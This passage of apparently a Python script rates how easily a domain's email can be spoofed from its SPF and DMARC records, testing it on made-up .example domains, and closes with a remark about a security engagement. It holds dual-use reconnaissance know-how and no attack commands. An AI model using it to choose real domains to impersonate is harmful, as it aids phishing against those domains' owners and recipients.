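    the From header enforceable, so no DMARC or p=none is spoofable whatever SPF
    says; +all lets any sender pass SPF; pct<100 and p=quarantine only partly stop it.
    """
    spf_all = parse_spf(spf_record)
    dmarc = parse_dmarc(dmarc_record)
    if dmarc is None:
        return "spoofable", "no DMARC record: SPF results are never enforced on the From header"
    if dmarc["p"] == "none":
        return "spoofable", "DMARC p=none only reports, it neither rejects nor quarantines"
    if spf_all == "+":
        return "spoofable", "SPF ends in +all, so any sender passes SPF and satisfies DMARC"
    if dmarc["pct"] < 100:
        return "partial", "DMARC pct=%d applies the policy to only part of the mail" % dmarc["pct"]
    if dmarc["p"] == "quarantine":
        return "partial", "p=quarantine sends spoofs to spam instead of rejecting them"
    spf_desc = "no SPF record" if spf_all is None else "SPF %sall" % spf_all
    return "protected", "DMARC p=%s with %s" % (dmarc["p"], spf_desc)


# Constructed records for made-up domains.
SAMPLE_RECORDS = {
    "no-dmarc.example": ("v=spf1 include:_spf.example.net -all", None),
    "monitor-only.example": ("v=spf1 ip4:203.0.113.0/24 -all", "v=DMARC1; p=none; rua=mailto:dmarc@monitor-only.example"),
    "plus-all.example": ("v=spf1 +all", "v=DMARC1; p=reject"),
    "sampled.example": ("v=spf1 -all", "v=DMARC1; p=reject; pct=20"),
    "quarantine.example": ("v=spf1 ~all", "v=DMARC1; p=quarantine"),
    "hardened.example": ("v=spf1 mx -all", "v=DMARC1; p=reject; sp=reject"),
}


def report(records=SAMPLE_RECORDS) -> dict:
    """Map domain -> verdict for a batch of (spf, dmarc) record pairs."""
    return {domain: spoofability(spf, dmarc)[0] for domain, (spf, dmarc) in records.items()}


if __name__ == "__main__":
    for domain, (spf, dmarc) in SAMPLE_RECORDS.items():
        print(domain, *spoofability(spf, dmarc))
```

The subdomain policy (sp) is parsed because spoofing a non-existent subdomain falls under it rather than under p; extend spoofability() with the sending subdomain if that case matters for the engagement.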